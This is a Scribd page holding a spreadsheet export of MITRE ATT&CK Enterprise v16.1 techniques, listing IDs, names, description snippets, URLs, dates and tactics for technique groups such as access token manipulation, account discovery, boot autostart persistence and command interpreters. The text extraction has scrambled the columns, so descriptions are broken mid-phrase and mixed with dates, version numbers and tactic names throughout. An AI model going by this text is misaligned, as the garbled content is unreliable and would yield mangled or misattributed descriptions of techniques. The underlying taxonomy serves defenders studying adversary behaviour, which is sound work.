0% found this document useful (0 votes)

1K views1,358 pages

Enterprise Attack v16.1 Techniques

Uploaded by

Smart's Vids

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as XLSX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

1K views1,358 pages

Enterprise Attack v16.1 Techniques

Uploaded by

Smart's Vids

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as XLSX, PDF, TXT or read online on Scribd

You are on page 1/ 1358

ID STIX ID name description url createdlast modifieddomain version tactics

T1548 attack-pat Abuse ElevAdversarieshttps://attack.mitre.org/techniques/T1548

30 January15 Octoberenterprise-1.4 Defense Eva
T1548.002attack-pat Abuse ElevAnother bypass
https://attack.mitre.org/techniques/T1548/002
is possible
30 January21
through April
some20enterprise-2.1
lateral movement techniques
Defense if Eva
credentials for an ac
T1548.004attack-pat Abuse ElevAdversarieshttps://attack.mitre.org/techniques/T1548/004
may abuse 30<code>AuthorizationExecuteWithPrivileges</code>
January19 Octoberenterprise-1.0 Defense Eva to obtain root priv
T1548.001attack-pat Abuse ElevAlternatively,
https://attack.mitre.org/techniques/T1548/001
adversaries 30 January15
may choose March to find enterprise-1.1 Defense
and target vulnerable binaries Evawith the setuid or
T1548.003attack-pat Abuse ElevIn the wild,https://attack.mitre.org/techniques/T1548/003
malware has 30 January14 March enterprise-1.0 to potentially
disabled <code>tty_tickets</code> Defense Eva make scripting easi
T1548.006attack-pat Abuse Elev https://attack.mitre.org/techniques/T1548/006
21 March 16 Octoberenterprise-1.1 Defense Evasion, Privi
T1548.005attack-pat Abuse Elev**Note:** https://attack.mitre.org/techniques/T1548/005
this technique 10 July 20 15 Octoberenterprise-1.2
is distinct Defense Evasion, Privi
from [Additional Cloud Roles](https://attack.mitre.org/tec
T1134 attack-pat Access TokAny standard https://attack.mitre.org/techniques/T1134
user can14use Decemb 30 March enterprise-2.0
the <code>runas</code> command, andDefense Eva
the Windows API function
T1134.002attack-pat Access TokWhile this technique
https://attack.mitre.org/techniques/T1134/002
is18distinct
Februar11 fromApril
[Token20enterprise-1.2 Defense Eva
Impersonation/Theft](https://attack.mitre.org/te
T1134.003attack-pat Access TokThis behaviorhttps://attack.mitre.org/techniques/T1134/003
is distinct 18from
Februar10
[TokenJanuaryenterprise-1.1 Defense Eva
Impersonation/Theft](https://attack.mitre.org/technique
T1134.004attack-pat Access TokExplicitly assigning the18PPID may also enable
https://attack.mitre.org/techniques/T1134/004
Februar03 May elevated privileges given
20 enterprise-1.0 Defense appropriate
Eva access righ
T1134.005attack-pat Access TokeWith Domain Administrator (or equivalent)
https://attack.mitre.org/techniques/T1134/005
18 Februar09 rights, harvested or well-known
Februarenterprise-1.0 Defense EvaSID values (Citatio
T1134.001attack-pat Access TokWhen an adversary would instead use a duplicated token to create
https://attack.mitre.org/techniques/T1134/001
18 Februar10 Januaryenterprise-1.2 a newEva
Defense process rather than
T1531 attack-pat Account AcAdversarieshttps://attack.mitre.org/techniques/T1531
who use ransomware
09 October15orOctoberenterprise-1.3
similar attacks may first perform
Impact this and other Impact b
T1087 attack-pat Account DiFor examples, cloud environments
31 May 20 15 typically
https://attack.mitre.org/techniques/T1087 provide easily accessible
Octoberenterprise-2.5 interfaces to obtain user
Discovery
T1087.004attack-pat Account DiThe AWS command <code>aws iamOctoberenterprise-1.3
list-users</code> may be used
https://attack.mitre.org/techniques/T1087/004
21 Februar15 to obtain a list of users in t
Discovery
T1087.002attack-pat Account DiCommandshttps://attack.mitre.org/techniques/T1087/002
such as <code>net
21 Februar31 user May
/domain</code> and <code>net
20 enterprise-1.2 group /domain</code> o
Discovery
T1087.003attack-pat Account DiIn Google Workspace, theFebruar17
GAL is shared
https://attack.mitre.org/techniques/T1087/003
21 with Microsoft Outlook users
Octoberenterprise-1.2 through the Google Wo
Discovery
T1087.001attack-pat Account DiCommandshttps://attack.mitre.org/techniques/T1087/001
such as <code>net
21 Februar11 user</code>
Januaryenterprise-1.4
and <code>net localgroup</code>
Discovery of the [Net](htt
T1098 attack-pat Account Ma In order to https://attack.mitre.org/techniques/T1098
create or manipulate
31 May 20 15 accounts,
Octoberenterprise-2.7
the adversary must already
Persistence
have sufficient permiss
T1098.001attack-pat Account Ma In Entra ID https://attack.mitre.org/techniques/T1098/001
environments 19 January14
with the app Octoberenterprise-2.8
password feature enabled,Persistence
adversaries may be able to
T1098.003attack-pat Account Ma In some cases,
https://attack.mitre.org/techniques/T1098/003
adversaries
19 January14
may addOctoberenterprise-2.5
roles to adversary-controlledPersistence
accounts outside the victim
T1098.006attack-pat Account ManNote that where
https://attack.mitre.org/techniques/T1098/006
container
14 Julyorchestration
20 16 Octoberenterprise-1.0
systems are deployed inPersistence,
cloud environments,
Privilege as with
T1098.002attack-pat Account Ma This may behttps://attack.mitre.org/techniques/T1098/002
used in persistent
19 January15 threatOctoberenterprise-2.2
incidents as well as BEC (Business
PersistenceEmail Compromise) in
T1098.007attack-pat Account Ma In Windowshttps://attack.mitre.org/techniques/T1098/007
environments, 05 August machine 14 Octoberenterprise-1.0
accounts may also be addedPersistence, Privilege
to domain groups. This allow
T1098.005attack-pat Account Ma https://attack.mitre.org/techniques/T1098/005
Devices registered 04 March
in Entra ID may 25be
Septementerprise-1.3 Persistence, Privilege
able to conduct [Internal Spearphishing](https://attack.
T1098.004attack-pat Account Ma SSH keys canhttps://attack.mitre.org/techniques/T1098/004
24 June
also be added to2003 Octoberenterprise-1.3
accounts on network devices, suchPersistence
as with the ìp ssh pubkey-c
T1650 attack-pat Acquire Ac**Note:** https://attack.mitre.org/techniques/T1650
10 March is14distinct
while this technique April 20enterprise-1.0 Resource
from other behaviors such as [Purchase Technical D
T1583 attack-pat Acquire InfUse of thesehttps://attack.mitre.org/techniques/T1583
30 Septem16
infrastructure solutionsOctoberenterprise-1.4
allows adversaries to stage, Resource
launch, and execute operatio
T1583.005attack-pat Acquire InfAdversarieshttps://attack.mitre.org/techniques/T1583/005
may buy, 01 lease,
October15
or rent April
a network20enterprise-1.0
of compromised systems
Resource that can be used duri
T1583.002attack-pat Acquire InfBy runninghttps://attack.mitre.org/techniques/T1583/002
their own 01 DNSOctober15 April 20enterprise-1.0
servers, adversaries Resource
can have more control over how they administ
T1583.001attack-pat Acquire In In additionhttps://attack.mitre.org/techniques/T1583/001
to legitimately purchasing
30 Septem25 a domain, an adversary may
Septementerprise-1.4 register a new domain in a
Resource
T1583.008attack-pat Acquire InfAdversaries may also employ several techniques
https://attack.mitre.org/techniques/T1583/008
21 Februar16 Octoberenterprise-1.0 to evade detection by theDevelopmen
Resource advertising netwo
T1583.004attack-pat Acquire InfAdversarieshttps://attack.mitre.org/techniques/T1583/004
may only 01 need a lightweight
October28 setup if most of their activities
Februarenterprise-1.3 Resource will take place using o
T1583.007attack-pat Acquire InfOnce acquired, the serverless runtime
01 Julyenvironment
https://attack.mitre.org/techniques/T1583/007
08 July 20 can be leveraged
20 enterprise-1.1 Resourceto either respond direct
Developmen
T1583.003attack-pat Acquire InfAcquiring ahttps://attack.mitre.org/techniques/T1583/003
VPS for use 01inOctober15
later stages of the adversary lifecycle, such
Octoberenterprise-1.1 Resourceas Command and Contro
T1583.006attack-pat Acquire InfAdversarieshttps://attack.mitre.org/techniques/T1583/006
may register 01 October16
for web services
Januaryenterprise-1.2
that can be used duringResource
targeting. A variety of popu
T1595 attack-pat Active Sca Adversarieshttps://attack.mitre.org/techniques/T1595
may perform different forms
02 October08 Marchofenterprise-1.0
active scanning depending
Reconnaisson what information t
T1595.001attack-pat Active ScanAdversarieshttps://attack.mitre.org/techniques/T1595/001
may scan02 IP blocks
October15 in order to [Gather Victim Network
Octoberenterprise-1.1 Information](https://attack
Reconnaiss
T1595.002attack-pat Active ScanThese scanshttps://attack.mitre.org/techniques/T1595/002
may also 02 include
October15
more Octoberenterprise-1.0
broad attempts to [Gather Victim Reconnaiss
Host Information](https
T1595.003attack-pat Active ScanAs cloud storage
https://attack.mitre.org/techniques/T1595/003
solutions
04 Marchtypically 15 April
use globally
20enterprise-1.0
unique names, adversaries
Reconnaissmay also use targe
T1557 attack-pat Adversary-Adversaries
Adversaries may use ARP cache poisoning as a means to interceptCollection,
https://attack.mitre.org/techniques/T1557
may also 11
leverage
Februar18 the AiTM
April position
20enterprise-2.4
to attempt to monitor
network and/or modify
traffic. This traffic,
activity
T1557.002attack-pat Adversary- https://attack.mitre.org/techniques/T1557/002
15 October22 July 20 enterprise-1.1 Collection,
T1557.003attack-pat Adversary-Rather thanhttps://attack.mitre.org/techniques/T1557/003
establishing 24 March
an AiTM12position,
Septementerprise-1.1
adversaries may also abuse
Collection,
DHCP spoofing to perfo
T1557.004attack-pat Adversary-iUpon logging
https://attack.mitre.org/techniques/T1557/004
into the17 malicious
Septem11 Wi-Fi
Novemb
access enterprise-1.0
point, a user may beCollection,
directed toCredential
a fake login pag
T1557.001attack-pat Adversary-Several tools
https://attack.mitre.org/techniques/T1557/001
may be used11 Februar25
to poisonOctoberenterprise-1.4
name services within local networks
Collection, such as NBNSpoof, M
T1071 attack-pat ApplicationAdversarieshttps://attack.mitre.org/techniques/T1071
may utilize 31many
May 20 different
28 Augustprotocols,
enterprise-2.3
including thoseCommand
used for web a browsing, tran
T1071.004attack-pat ApplicationThe DNS protocol
https://attack.mitre.org/techniques/T1071/004
15 March
serves 26 Decembfunction
an administrative enterprise-1.2
in computer Command
networkingaand thus may be
T1071.002attack-pat ApplicationProtocols such
https://attack.mitre.org/techniques/T1071/002
15 March US-CERT
as SMB(Citation: 18 Januaryenterprise-1.2
TA18-074A), FTP(Citation: Command a
ESET Machete July 2019),
T1071.003attack-pat ApplicationProtocols such
https://attack.mitre.org/techniques/T1071/003
15 March
as SMTP/S, POP3/S,16 April
and IMAP20enterprise-1.1
that carry electronicCommand
mail mayabe very common
T1071.005attack-pat ApplicationProtocols such
https://attack.mitre.org/techniques/T1071/005
28 August 16 Octoberenterprise-1.0
as <code>MQTT</code>, Command and Controand <c
<code>XMPP</code>, <code>AMQP</code>,
T1071.001attack-pat ApplicationProtocols such
https://attack.mitre.org/techniques/T1071/001
15 March 16 CrowdStrike
as HTTP/S(Citation: April 20enterprise-1.3
Putter Panda) andCommand a
WebSocket(Citation: Brazki
T1010 attack-pat Applicatio Adversarieshttps://attack.mitre.org/techniques/T1010
31 May
typically abuse 20 15 features
system Octoberenterprise-1.3 DiscoveryFor example, they m
for this type of enumeration.
T1560 attack-pat Archive Co Both compression
https://attack.mitre.org/techniques/T1560
and20encryption
Februar20are Januaryenterprise-1.0
done prior to exfiltration, andCollection
can be performed using a
T1560.003attack-pat Archive CoAn adversarhttps://attack.mitre.org/techniques/T1560/003
20 Februar25 March enterprise-1.0 Collection
T1560.002attack-pat Archive ColSome archival libraries20are preinstalled on systems,
https://attack.mitre.org/techniques/T1560/002
Februar29 March such as bzip2Collection
enterprise-1.0 on macOS and Linux, and zip
T1560.001attack-pat Archive ColAdversarieshttps://attack.mitre.org/techniques/T1560/001
may use also third partySeptementerprise-1.3
20 Februar15 utilities, such as 7-Zip, WinRAR, and WinZip, to perform s
Collection
T1123 attack-pat Audio CaptMalware orhttps://attack.mitre.org/techniques/T1123
scripts may 31beMay used to interact
20 15 with the devices through
Octoberenterprise-1.0 an available API provided
Collection
T1119 attack-pat AutomatedThis technique may incorporate useSeptementerprise-1.3
of other techniques such as [File
https://attack.mitre.org/techniques/T1119
31 May 20 25 and Directory Discovery
Collection
T1020 attack-pat AutomatedWhen automated exfiltration is used, other exfiltration techniques
https://attack.mitre.org/techniques/T1020
31 May 20 24 Januaryenterprise-1.2 likely apply as well to trans
Exfiltration
T1020.001attack-pat AutomatedAdversaries
E may use traffic duplication in conjunction with [Network
https://attack.mitre.org/techniques/T1020/001
19 October15 Octoberenterprise-1.3 Sniffing](https://attack.m
Exfiltration
T1197 attack-pat BITS Jobs BITS uploadhttps://attack.mitre.org/techniques/T1197
functionalities
18 Aprilcan2021
also April
be used to perform [Exfiltration
20enterprise-1.4 Over Alternative
Defense Ev Protocol
T1547 attack-pat Boot or Lo Since somehttps://attack.mitre.org/techniques/T1547
boot or logon autostart Septementerprise-1.2
23 January12 programs run with higher privileges,
Persistencean adversary may lev
T1547.014attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1547/014
can abuse18these Decembcomponents
22 March toenterprise-1.0
execute malware, such Persistence
as remote access tools, to
T1547.002attack-pat Boot or Lo Adversarieshttps://attack.mitre.org/techniques/T1547/002
can use the 24 autostart
January20mechanism
April 20enterprise-1.0
provided by LSA authentication
Persistence packages for pe
T1547.006attack-pat Boot or Lo Adversarieshttps://attack.mitre.org/techniques/T1547/006
can use LKMs 24 January12
and kextsSeptementerprise-1.3
to conduct [Persistence](https://attack.mitre.org/tactics/
Persistence
T1547.008attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1547/008
may target 24LSASS
January20
driversApril
to obtain
20enterprise-1.0
persistence. By either
Persistence
replacing or adding illeg
T1547.015attack-pat Boot or LogAdversaries
* WSD Porthttps://attack.mitre.org/techniques/T1547/015
can utilize05[AppleScript](https://attack.mitre.org/techniques/T1059/002)
October18 Octoberenterprise-1.0 Persistence and [Na
T1547.010attack-pat Boot or Lo https://attack.mitre.org/techniques/T1547/010
24 January12 Septementerprise-1.2 Persistence
T1547.012attack-pat Boot or LogThe print spooler
https://attack.mitre.org/techniques/T1547/012
05 October04
service runs underOctoberenterprise-1.1 Persistence
SYSTEM level permissions, therefore print processors ins
T1547.007attack-pat Boot or Lo Adversarieshttps://attack.mitre.org/techniques/T1547/007
can establish24 January19 April 20enterprise-1.1 Persistence
[Persistence](https://attack.mitre.org/tactics/TA0003) by adding a m
T1547.001attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1547/001
can use these23 January12 Septementerprise-2.0
configuration Persistence
locations to execute malware, such as remote access
T1547.005attack-pat Boot or LogThe SSP configuration
https://attack.mitre.org/techniques/T1547/005
24 January25
is stored March
in two enterprise-1.0
Registry Persistence
keys: <code>HKLM\SYSTEM\CurrentControlSet
T1547.009attack-pat Boot or LogShortcuts can
https://attack.mitre.org/techniques/T1547/009
also be 24 January15
abused Octoberenterprise-1.2
to establish Persistence
persistence by implementing other methods. For ex
T1547.003attack-pat Boot or Lo Adversarieshttps://attack.mitre.org/techniques/T1547/003
may abuse 24this
January12 April to
architecture 20enterprise-1.1
establish persistence,Persistence
specifically by creating a new
T1547.004attack-pat Boot or Lo Adversarieshttps://attack.mitre.org/techniques/T1547/004
may take 24 January14
advantage of Februarenterprise-1.2
these features to repeatedly Persistence
execute malicious code and e
T1547.013attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1547/013
may combine this technique
10 Septem16 with [Masquerading](https://attack.mitre.org/techn
Octoberenterprise-1.1 Persistence
T1037 attack-pat Boot or LogAn adversary may also be able to escalate
https://attack.mitre.org/techniques/T1037 their
31 May 20 16 April 20enterprise-2.3privileges since some boot or logon initializati
Persistence
T1037.002attack-pat Boot or Log**Note:** https://attack.mitre.org/techniques/T1037/002
Login hooks 10were deprecated
January20 in 10.11 version of macOS
April 20enterprise-2.0 in favor of [Launch Daemo
Persistence
T1037.001attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1037/001
may use these scripts toMarch
10 January24 maintain persistence on a single
enterprise-1.0 system. Depending on t
Persistence
T1037.003attack-pat Boot or LogAdversarieshttps://attack.mitre.org/techniques/T1037/003
may use these scripts toMarch
10 January24 maintain persistence on a network.
enterprise-1.0 PersistenceDepending on the ac
T1037.004attack-pat Boot or LogSeveral Unix-like systems have moved to Systemd
https://attack.mitre.org/techniques/T1037/004
15 January16 April 20enterprise-2.1 and deprecated the use
Persistence of RC scripts. This i
T1037.005attack-pat Boot or LogAn adversary can create the appropriate folders/files in the StartupItems
https://attack.mitre.org/techniques/T1037/005
15 January20 April 20enterprise-1.0 Persistence directory to register
T1176 attack-pat Browser ExThere havehttps://attack.mitre.org/techniques/T1176
also been 16 instances
January12 of botnets using a persistent backdoor
Septementerprise-1.3 through malicious Chro
Persistenc
T1217 attack-pat Browser InSpecific storage
https://attack.mitre.org/techniques/T1217
locations
18 April
vary2016
basedApril
on platform
20enterprise-2.0
and/or application,
Discovery
but browser information
T1185 attack-pat Browser SeAnother example
https://attack.mitre.org/techniques/T1185
involves
16 January25
pivoting browser
Februarenterprise-2.0
traffic from the adversary's
Collectionbrowser through the u
T1110 attack-pat Brute Forc Brute forcing
https://attack.mitre.org/techniques/T1110
credentials31 May
may 20 take
14 place
Octoberenterprise-2.6
at various points during Credential
a breach. For example, adve
T1110.004attack-pat Brute ForceIn additionhttps://attack.mitre.org/techniques/T1110/004
to management 11 Februar14
services,Octoberenterprise-1.6
adversaries may "target single Credential
sign-on (SSO) and cloud-b
T1110.002attack-pat Brute Forc Techniqueshttps://attack.mitre.org/techniques/T1110/002
to systematically
11 Februar14
guess Octoberenterprise-1.3
the passwords used to compute Credential
hashes are available, or th
T1110.001attack-pat Brute Forc In default environments,
https://attack.mitre.org/techniques/T1110/001
11 Februar14
LDAP and Octoberenterprise-1.6
Kerberos connection attemptsCredentialare less likely to trigger eve
T1110.003attack-pat Brute Forc In default environments,
https://attack.mitre.org/techniques/T1110/003
11 Februar14
LDAP and Octoberenterprise-1.6
Kerberos connection attemptsCredentialare less likely to trigger eve
T1612 attack-pat Build Imag An adversaryhttps://attack.mitre.org/techniques/T1612
may take 30advantage
March 15ofApril that20enterprise-1.3
<code>build</code> API Defense
to buildEva custom image on
T1115 attack-pat Clipboard macOS andhttps://attack.mitre.org/techniques/T1115
Linux also31 May
have 20 14 Aprilsuch
commands, 20enterprise-1.2 Collection
as <code>pbpaste</code>, to grab clipboard con
T1651 attack-pat Cloud AdmIf an adversary
https://attack.mitre.org/techniques/T1651
13 March 15 Octoberenterprise-2.0
gains administrative access to a cloud environment, Execution
they may be able to abuse
T1580 attack-pat Cloud InfraAn adversaryhttps://attack.mitre.org/techniques/T1580
20 August
may enumerate 30 Septementerprise-1.3
resources using a compromised user's Discovery
access keys to determine
T1538 attack-pat Cloud Serv Dependinghttps://attack.mitre.org/techniques/T1538
30 August 15
on the configuration Octoberenterprise-1.4
of the environment, an adversary Discovery
may be able to enumerate
T1526 attack-pat Cloud Serv Adversarieshttps://attack.mitre.org/techniques/T1526
may use the 30 August 14 Octoberenterprise-1.4
information Discovery such as targeting d
gained to shape follow-on behaviors,
T1619 attack-pat Cloud Stor Cloud service
https://attack.mitre.org/techniques/T1619
providers 01offer
October11 April 20enterprise-1.0
APIs allowing users to enumerate objectsDiscoverystored within cloud sto
T1059 attack-pat Command Adversaries
an https://attack.mitre.org/techniques/T1059
may abuse 31these
May 20 14 Octoberenterprise-2.5
technologies in various ways as a meansExecution
of executing arbitrary c
T1059.002attack-pat Command Adversaries
an https://attack.mitre.org/techniques/T1059/002
may abuse 09AppleScript
March 15 Octoberenterprise-1.2
to execute various behaviors,Execution
such as interacting with an o
T1059.010attack-pat Command These
an scripts may also29beMarchcompiled into self-contained
https://attack.mitre.org/techniques/T1059/010
28 April 20enterprise-1.0 executable payloads (`.exe`).(Citation:
Execution
T1059.009attack-pat Command With
an proper permissions (often via
15 use of credentials such as [Application
https://attack.mitre.org/techniques/T1059/009
17 March Octoberenterprise-1.1 ExecutionAccess Token](https
T1059.007attack-pat Command Adversaries
an may abuse 23various implementations
https://attack.mitre.org/techniques/T1059/007
June 2030 of JavaScript to Execution
July 20 enterprise-2.2 execute various behaviors. C
T1059.011attack-pat Command Luaan scripts https://attack.mitre.org/techniques/T1059/011
may be executed
05 August by adversaries for malicious purposes.
01 Octoberenterprise-1.0 Adversaries may incorpora
Execution
T1059.008attack-pat Command Adversaries
an can use the 20 network CLIApril
to change
https://attack.mitre.org/techniques/T1059/008
October19 how network devices
20enterprise-1.1 behave and operate. The
Execution
T1059.001attack-pat Command PowerShell
an commands/scripts
09 Marchcan 15also be executed without directly
https://attack.mitre.org/techniques/T1059/001
Octoberenterprise-1.4 invoking the <code>pow
Execution
T1059.006attack-pat Command Python
an comes with many built-in30packages to interact with the underlying
https://attack.mitre.org/techniques/T1059/006
09 March Januaryenterprise-1.0 Executionsystem, such as file
T1059.004attack-pat Command Adversaries
an may abuse 09Unix shells
15to execute various commandsExecution
https://attack.mitre.org/techniques/T1059/004
March Octoberenterprise-1.2 or payloads. Interactive shel
T1059.005attack-pat Command Adversaries
and https://attack.mitre.org/techniques/T1059/005
may use VB 09 payloads
March 15toOctoberenterprise-1.4
execute malicious commands. Execution
Common malicious usage
T1059.003attack-pat Command Adversaries
an https://attack.mitre.org/techniques/T1059/003
may leverage09 March
[cmd](https://attack.mitre.org/software/S0106)
15 Octoberenterprise-1.4 Execution to execute various
T1092 attack-pat CommunicaAdversarie https://attack.mitre.org/techniques/T1092
31 May 20 31 Januaryenterprise-1.0 Command a
T1586 attack-pat CompromisAdversarieshttps://attack.mitre.org/techniques/T1586
may directly01 October11
leverage compromised
April 20enterprise-1.2
email accounts forResource
[Phishing for Information]
T1586.003attack-pat Compromise A variety ofhttps://attack.mitre.org/techniques/T1586/003
methods exist27 May for20compromising
16 Octoberenterprise-1.1
cloud accounts, suchResource
as gathering credentials via
T1586.002attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1586/002
can use a01 compromised
October11 April email20enterprise-1.1
account to hijack existingResource
email threads with target
T1586.001attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1586/001
can use a01 October16 Octoberenterprise-1.1
compromised social media profile to createResource
new, or hijack existing, conn
T1554 attack-pat Compromise https://attack.mitre.org/techniques/T1554
After modifying 11 Februar12
a binary, an adversary Octoberenterprise-2.1 Persistenc
may attempt to [Impair Defenses](https://attack.mitre.
T1584 attack-pat Compromise https://attack.mitre.org/techniques/T1584
By using compromised 01infrastructure,
October16 Octoberenterprise-1.5 Resource
adversaries may make it difficult to tie their actions bac
T1584.005attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1584/005
may compromise
01 October19 numerous
April 20enterprise-1.0
third-party systems to form Resource
a botnet that can be use
T1584.002attack-pat Compromise https://attack.mitre.org/techniques/T1584/002
By compromising DNS01 October19
servers, April 20enterprise-1.2
adversaries can alter DNS records.Resource
Such control can allow for r
T1584.001attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1584/001
01 October24
who compromise Septementerprise-1.4
a domain may also engage in domain Resource
shadowing by creating ma
T1584.008attack-pat Compromise Compromised https://attack.mitre.org/techniques/T1584/008
network 28devices
March may 15 Octoberenterprise-1.0
be used to support subsequent Resource
[CommandDevelopmen
and Control](h
T1584.004attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1584/004
may also 01 compromise
October31web servers to support watering
Januaryenterprise-1.2 hole operations, as in [Dri
Resource
T1584.007attack-pat Compromise Once compromised, the serverless runtime environment
https://attack.mitre.org/techniques/T1584/007
08 July 20 03 Octoberenterprise-1.1 can be leveraged to either respond d
Resource Developmen
T1584.003attack-pat Compromise Compromising a VPS for use in laterOctoberenterprise-1.1
stages of the adversary lifecycle,
https://attack.mitre.org/techniques/T1584/003
01 October17 such as Command and C
Resource
T1584.006attack-pat Compromise Adversarieshttps://attack.mitre.org/techniques/T1584/006
may compromise
01 October15 accessOctoberenterprise-1.2
to third-party web services that Resource
can be used during targe
T1609 attack-pat Container In Docker, adversaries may specify
15 an entrypoint during containerExecution
https://attack.mitre.org/techniques/T1609
29 March Octoberenterprise-1.2 deployment that executes
T1613 attack-pat Container These resources can be viewed within web
https://attack.mitre.org/techniques/T1613 applications
31 March 15 April 20enterprise-1.1 such as the Kubernetes dashboard or
Discovery
T1659 attack-pat Content InjContent injection is often the resultOctoberenterprise-1.0
of compromised upstream communication
https://attack.mitre.org/techniques/T1659
01 Septem01 Command andchannels,
Control, for e
T1136 attack-pat Create AccAccounts may be created on the15 local system or within a domainPersistenc
